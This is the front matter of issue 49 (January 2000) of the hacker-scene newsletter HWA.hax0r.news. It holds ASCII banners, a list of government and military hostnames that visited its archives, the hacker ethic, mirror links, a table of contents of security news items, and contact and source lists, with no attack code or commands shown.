[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA 2000=] Number 49 Volume 2 Issue 1 1999 Jan 2000 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ NEW YEAR EDITION: This is #49 covering Dec 26th to Jan 15th ========================================================================== _ ___ ___ ____ ___ ___ ___ | | | \ \ / / \ |___ \ / _ \ / _ \ / _ \ | |_| |\ \ /\ / / _ \ __) | | | | | | | | | | | _ | \ V V / ___ \ / __/| |_| | |_| | |_| | |_| |_| \_/\_/_/ \_\_____|\___/ \___/ \___/ _ _ _ _ __ __ _ | || |__ _ _ __ _ __ _ _| \| |_____ __ _\ \ / /__ __ _ _ _| | | __ / _` | '_ \ '_ \ || | .` / -_) V V /\ V / -_) _` | '_|_| |_||_\__,_| .__/ .__/\_, |_|\_\___|\_/\_/ |_|\___\__,_|_| (_) |_| |_| |__/ "Providing news archives of recent events into the new millennium..." ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Mailing list members: 20 New members over Xmas, we're now at 496. Can we bump this up somewhat? spread the word! ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ | | | | ___ | |_ | |_| |/ _ \| __| | _ | (_) | |_ |_| |_|\___/ \__| _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ .gov and .mil activity fitzgerald.ags.bnl.gov zephyr1.pnl.gov ihvideo.lewisham.gov.uk shihonage.gsfc.nasa.gov burnia.dmz.health.nsw.gov.au ococ.oc.ca.gov guardian.gov.sg aragorn.dpa.act.gov.au ipaccess.gov.ru eagle-ts222.korea.army.mil gate1.noc.usmc.mil eagle-ts209.korea.army.mil proxy.vandenberg.af.mil lax.dcmdw.dla.mil beowulf.ramstein.af.mil cofcs71.aphis.usda.gov samds4.sam.pentagon.mil eg-016-045.eglin.af.mil pacfa.evepier.navy.mil obgate.hill.af.mil biglost.inel.gov marshall.state.gov flatline.arc.nasa.gov mars.istac.gov gateway1.osd.mil gateway3.osd.mil elan5172.cbcph.navy.mil proxy.gintic.gov.sg doegate.doe.gov sunspot.gsfc.nasa.gov gate1.mcbh.usmc.mil homer.nawcad.navy.mil maggie.nawcad.navy.mil lisa.nawcad.navy.mil msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov mc1926.mcclellan.af.mil kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good Is It Worth It Followup to see our boys keeping up with the news... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _ ___ ___ _ ___ | | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____ | |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __| | _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \ |_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ _ _ ____ _ __ __ / ___| ___ _ __ __ _| |_ ___| |__ __ _ _ __ __| / ___| _ __ (_)/ _|/ _| \___ \ / __| '__/ _` | __/ __| '_ \ / _` | '_ \ / _` \___ \| '_ \| | |_| |_ ___) | (__| | | (_| | || (__| | | | (_| | | | | (_| |___) | | | | | _| _| |____/ \___|_| \__,_|\__\___|_| |_|\__,_|_|_|_|\__,_|____/|_| |_|_|_| |_| / ___| _ __ ___ ___(_) __ _| | | \___ \| '_ \ / _ \/ __| |/ _` | | | ___) | |_) | __/ (__| | (_| | |_| |____/| .__/ \___|\___|_|\__,_|_(_) |_| PRINT OUT THIS ISSUE ON YOUR CORPORATE PRINTER OR DADDY'S PRINTER WHEN HE ISN'T LOOKING (IT'S KINDA BIG) OR JUST PRINT THIS SECTION OUT WITH A SCREEN CAPTURE AND SCRATCH THE #'S FOR A GREAT SURPRISE! ########################################################################## ####################################_##################################### ###################################| |#################################### ##################################/ __)################################### ##################################\_ \#################################### ##################################( /################################### ###################################|_|#################################### ########################################################################## ########################################################################## ########################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _ _ _ _ _____ _ _ _ | | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___ | |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __| | _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__ |_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___| Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _____ _ _ _ | ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _ | |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` | | _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| | |_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, | |___/ A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed BTW if anyone can suggest a better editor than UEDIT for this thing send me some email i'm finding it lacking in certain areas. Must be able to produce standard ascii. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= __ __ _ | \/ (_)_ __ _ __ ___ _ __ ___ | |\/| | | '__| '__/ _ \| '__/ __| | | | | | | | | | (_) | | \__ \ |_| |_|_|_| |_| \___/|_| |___/ New mirror sites *** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW *** *** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ *** http://datatwirl.intranova.net * NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. *** Most likely to be up to date other than the main site. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... /join #HWA.hax0r.news on EFnet. ************************************************************************** "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Eris Free Net #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. www.2600.com, jokers to the end?................................. 04.0 .. More irc4all proxies............................................. 05.0 .. Simple Windows Dos using common tools and UDP.................... 06.0 .. Slash interviews website defacer/cracker Fuqrag.................. 07.0 .. Interview with sSh member YTcracker ............................. 08.0 .. Interview with gH member Mosthated............................... 09.0 .. Mosthated/gH advisory Jan 10th 2000.............................. 10.0 .. HNN's 1999 Year In Review 12/26/99.............................. 11.0 .. 16th CCC Congress opens Monday in Berlin 12/26/99................ 12.0 .. Canadian Youth Held for Cyber Ransom 12/26/99................... 13.0 .. Poulsen's List of Gifts to Get a Hacker 12/26/99................ 14.0 .. More FUD About Cyberterrosists and Y2K 12/26/99................. 15.0 .. The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99. 16.0 .. One Third of UK Vulnerable to Online Attack 12/27/99............ 17.0 .. Grades Changed at NY School 12/27/99............................. 18.0 .. Cops Wanted, Hackers Need Not Apply 12/27/99..................... 19.0 .. IDS Signature Database Open to the Public 12/27/99............... 20.0 .. InfoSecurity 1999 Year in Review 12/27/99........................ 21.0 .. Butchered From Inside 7 12/27/99................................. 22.0 .. DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99 23.0 .. Web Based CGI Vulnerability Scanner Released 12/28/99............ 24.0 .. L0pht Interviewed by Slashdot 12/28/99........................... 25.0 .. AirForce to Close Web Sites Over Y2K 12/28/99.................... 26.0 .. Sweden Plans Cyber Defense and Attack Force 12/28/99............. 27.0 .. DVD Industry Files Lawsuit Over DeCSS 12/29/99................... 28.0 .. No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99.... 29.0 .. Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99 30.0 .. More from CCC Congress in Germany 12/29/99....................... 31.0 .. Apple Patches OS 9 Security Hole 12/29/99........................ 32.0 .. The need for physical security - Securing the OpenBSD console 12/29/99 33.0 .. New Era: Buffer Overflow Article by evenprime 01/03/00........... 34.0 .. Gangly Mentality, Y2K hype by ytcracker 01/03/00................. 35.0 .. "Scene Whores" By Eric Parker/Mind Security 01/03/00............. 36.0 .. DVD Control Association Looses First Round 01/03/00.............. 37.0 .. First Viruses of the New Year Discovered 01/03/00................ 38.0 .. Reports from Chaos Computer Congress 01/03/00.................... 39.0 .. Gateway Sells Amiga 01/03/00..................................... 40.0 .. CIH Author Hired by Taiwanese Company 01/03/00................... 41.0 .. Body-Scanners Used by US Customs 01/03/00........................ 42.0 .. Defacements Continue Unabated in the New Year 01/03/00........... 43.0 .. WebTV Hole Causes Spam 01/04/00.................................. 44.0 .. Vandalism or Hactivism? 01/04/00................................. 45.0 .. No Longer Worried About Y2K Feds Look to Security 01/04/00....... 46.0 .. Interview With Richard Smith 01/04/00............................ 47.0 .. Interview with Adam Penenberg 01/04/00........................... 48.0 .. KISA Discovers Y2K Bug 01/04/00.................................. 49.0 .. Sprint Says 'Area 51' Does Exist 01/04/00........................ 50.0 .. Spoofing your HTTP referrer ..................................... 51.0 .. OSALL removed from the net. 01/13/00............................. 52.0 .. $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper.... 53.0 .. Bill Gates hands over CEO hat to Steve Ballmer................... 54.0 .. First Windows 2000 virus found................................... 55.0 .. InterNIC domain name hijacking: "It happens"..................... 56.0 .. "A well known but overlooked threat to Hackers: Themselves"...... 57.0 .. The complete guide to hax0ring. ................................. 58.0 .. FAA Systems Vulnerable Due to Y2K Fixes 01/05/00................. 59.0 .. Internal Employees Greatest Threat Says New Study 01/05/00....... 60.0 .. Are the Greatest Risks Internal or External? 01/05/00............ 61.0 .. Japanese Firms Turn To Security After Y2K 01/05/00............... 62.0 .. Virus FUD Continues 01/05/00..................................... 63.0 .. L0pht Merges With @Stake, Receives Funding 01/06/00.............. 64.0 .. Offensive Cyberwar Capabilities Taking Shape 01/06/00............ 65.0 .. Army Criticized By Judge On Lack of Security 01/06/00............ 66.0 .. FAA Responds to Allegations 01/06/00............................. 67.0 .. Electronic Intruder released with Fine and No Jail 01/06/00...... 68.0 .. PalmCrack 1.0 Released 01/06/00.................................. 69.0 .. Radio Pirates (criminals) Steal Police Airwaves 01/06/00......... 70.0 .. ParseTV has Abruptly Canceled 01/07/00........................... 71.0 .. Finland Authorities Solve Massive Computer Crime Case 01/07/00... 72.0 .. The EPA Cracks Down On Security 01/07/00......................... 73.0 .. FBI Still Investigating Y2K Cyber Threats 01/07/00............... 74.0 .. Clinton Wants Increased Computer Security 01/07/00............... 75.0 .. Interview with Lloyd's of London and RailTrack Defacer 01/07/00.. 76.0 .. Pac Bell Hit by Possible Cyber Intruder 01/10/00................. 77.0 .. Virgin ISP Issues New Passwords 01/10/00......................... 78.0 .. CD Universe Customer Info Compromised 01/10/00................... 79.0 .. Northwest Notifies Customers of Security Breech 01/10/00......... 80.0 .. Parse Issues Statement About Cancellation 01/10/00............... 81.0 .. HACK.CO.ZA DoS attack forces ISP to remove site.................. 82.0 .. Comments on Linux Security 01/10/00.............................. 83.0 .. PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00.. 84.0 .. Taiwan Claims 1000 Viruses In Arsenal 01/10/00................... 85.0 .. Reno Announces LawNet 01/11/00................................... 86.0 .. Domains Redirected 01/11/00...................................... 87.0 .. Report on SuperComputer Sale to China Released 01/11/00.......... 88.0 .. Kevin Mitnick Interview 01/11/00................................. 89.0 .. Encryption Keys Easily Found On Systems 01/11/00................. 90.0 .. Buffer Overflow: Reform the AV Industry 01/11/00................. 91.0 .. China Registering Businesses to Monitor the Net 01/12/00......... 92.0 .. CD Universe Thief Threatens to Post more CC Numbers 01/12/00..... 93.0 .. Army Plans on DMZs for Its Networks 01/12/00..................... 94.0 .. CBS Alters On Air Images During News 01/12/00.................... 95.0 .. Direct TV Service Stolen in Illinois 01/12/00.................... 96.0 .. Security Book Released on Net for Free 01/12/00.................. 97.0 .. States Can't Sell Private Info 01/14/00.......................... 98.0 .. Mitnick Free Next Friday 01/14/00................................ 99.0 .. Internet Banned From Jewish Homes 01/14/00....................... 100.0 .. NJ Teens Steal CC Numbers 01/14/00............................... 101.0 .. Radius Net takes over Attrition Mirrors 01/14/00................. 102.0 .. New Ezines Available 01/14/00.................................... 103.0 .. FBI to Beef Up CyberCrime Investigation Abilities 01/15/00....... 104.0 .. UDP Called For Against @Home 01/15/00............................ 105.0 .. ACPM Changes Name and Stops Intrusions 01/15/00.................. 106.0 .. GCHQ Wants a Few Good Cryptographers 01/15/00.................... 107.0 .. Internet Intoxication Used as Defense 01/15/00................... 108.0 .. Blacksun's Unix Security for Newbies version 1.0, 21/11/99....... 109.0 .. Where are the exploits and advisories??.......................... =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #HWA.hax0r.news @HWA 00.2 Sources *** ~~~~~~~~~~~ ____ / ___| ___ _ _ _ __ ___ ___ ___ \___ \ / _ \| | | | '__/ __/ _ Y __| ___) | (_) | |_| | | | (_| __|__ \ |____/ \___/ \__,_|_| \___\___|___/ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ s News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq win2kbugtraq <+others> ___ | _ \___ ______ _ _ _ _ __ ___ ___ | / -_|_-< _ \ || | '_/ _/ -_|_-< |_|_\___/__|___/\_,_|_| \__\___/__/ NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PLEASE if you have any changes or additions for this section please mail them to cruciphux@dok.org. Thank you. http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site http://www.hack.co.za/ Current exploits archive Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ _ / ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___ \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __| ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \ |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists 